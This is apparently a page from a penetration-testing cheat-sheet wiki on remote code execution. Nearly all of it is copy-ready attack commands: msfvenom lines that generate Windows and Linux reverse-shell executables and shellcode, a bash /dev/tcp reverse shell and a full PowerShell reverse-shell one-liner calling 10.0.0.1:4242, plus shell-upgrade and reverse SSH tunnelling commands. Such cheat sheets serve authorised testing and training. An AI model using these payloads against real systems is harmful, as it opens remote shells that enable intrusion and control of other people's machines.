Remote Code Execution

MSFVenom Reverse Shell

Check list

msfvenom  --list encoders

Windows

File

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

Shell Code

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -v shellcode -f py

Linux

File

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Shell Code

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -v shellcode -f py

Reverse Shell Cheat Sheet

Reverse Shell using bash

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Reverse Shell using PowerShell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Remote Desktop

rdesktop $ip -u Tester -p Pass

xfreerdp /f /u:Tester /p:<Pass> /v:192.168.0.101 /drive:D,/tmp

Upgrade shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

stty raw -echo
fg

Port Tunneling

https://www.ssh.com/ssh/tunneling/example

ssh -R $myip:8080:127.0.0.1:8080 kali@$myip

PreviousPostgreSQL NextFile Transfer

Last updated 3 years ago